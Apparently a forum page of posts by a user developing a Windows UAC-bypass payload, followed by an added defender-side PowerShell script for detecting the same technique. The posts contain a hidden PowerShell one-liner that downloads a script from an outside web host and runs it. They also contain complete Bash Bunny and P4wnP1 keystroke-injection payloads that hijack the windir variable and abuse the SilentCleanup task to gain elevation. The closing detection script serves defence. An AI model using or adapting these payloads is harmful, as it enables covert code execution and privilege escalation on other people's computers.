
KryptoKat

Posts posted by KryptoKat

  1. ---UPDATE---

    I finally got the PowerShell script functioning. In theory, this should work on any account because everyone has access to C:\Windows\Temp.

    powershell -w h -ep bypass curl -OutFile 'C:\Windows\Temp\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt'; C:\Windows\Temp\uac.ps1

    Now to find something useful to do with this

  2. ---UPDATE---

    I've simplified the script to

    powershell -w h curl -OutFile '%USERPROFILE%\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt';

    However, I'm having trouble running the file on the same line; any help would be greatly appreciated.

  3. In theory, this Bash Bunny script should make a directory in C:\Windows called uac-bypassed. I have no way to test this specific script because I don't have a Bash Bunny or a Rubber Ducky, so I had to make do with a P4wnP1 A.L.O.A. Any help making this payload smaller would be greatly appreciated.
    (The command at the bottom is for the P4wnP1 A.L.O.A.)


    Q GUI R
    Q powershell
    Q ENTER
    Q DELAY 500
    Q "echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1"
    Q ENTER
    Q Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
    Q ENTER
    Q DELAY 500
    Q a
    Q .\\uac.ps1
    Q ENTER
    Q rmdir uac.ps1
    Q ENTER
    Q Set-ExecutionPolicy Undefined -Scope CurrentUser
    Q ENTER
    Q DELAY 500
    Q a
    Q ENTER
    Q exit
    Q ENTER
    P4wnP1_cli hid run -c 'layout("us"); typingSpeed(15,0); press("GUI R"); type("powershell"); press("ENTER"); delay(500); type(" echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type(".\\uac.ps1"); press("ENTER"); type("rmdir uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy Undefined -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type("exit"); press("ENTER");'
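As an added example that is not part of KryptoKat's posts: a defender-side PowerShell check for the two things this payload depends on, a `windir` value planted under a user's `HKCU\Environment` key and the elevated SilentCleanup scheduled task that expands it. The function names are my own, and the last function assumes Sysmon is installed with a registry rule covering user Environment keys.

```powershell
# Added example, not from the post. Run from an elevated prompt so every loaded user hive is readable.
# The bypass above writes HKCU\Environment\windir so that the SilentCleanup scheduled task
# (which runs with highest privileges and expands %windir%) executes the attacker's command.

function Find-WindirEnvHijack {
    # A normal user hive has no 'windir' under Environment; the real value lives in HKLM only.
    Get-ChildItem 'Registry::HKEY_USERS' |
        Where-Object { $_.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$' } |
        ForEach-Object {
            $envKey = "Registry::HKEY_USERS\$($_.PSChildName)\Environment"
            $prop = Get-ItemProperty -Path $envKey -Name 'windir' -ErrorAction SilentlyContinue
            if ($null -ne $prop) {
                [pscustomobject]@{
                    Sid    = $_.PSChildName
                    Value  = $prop.windir
                    Remedy = "Remove-ItemProperty -Path '$envKey' -Name 'windir'"
                }
            }
        }
}

function Get-SilentCleanupExposure {
    # The task is the elevation step; if it is disabled the hijacked variable has nothing to ride on.
    $task = Get-ScheduledTask -TaskPath '\Microsoft\Windows\DiskCleanup\' -TaskName 'SilentCleanup' -ErrorAction SilentlyContinue
    if ($null -eq $task) { return 'SilentCleanup task not present' }
    $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
    "SilentCleanup state: $($task.State); actions: $actions"
}

function Get-RecentWindirRegistryWrites {
    # Sysmon event 13 (RegistryEvent, value set) records the Set-ItemProperty call if a rule
    # covers user Environment keys (assumption); without Sysmon this simply returns nothing.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 13 } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match '\\Environment\\windir' } |
        Select-Object TimeCreated, Message
}

Find-WindirEnvHijack
Get-SilentCleanupExposure
Get-RecentWindirRegistryWrites
```

Any hit from the first function is worth treating as an incident rather than a misconfiguration, since nothing legitimate sets `windir` per user.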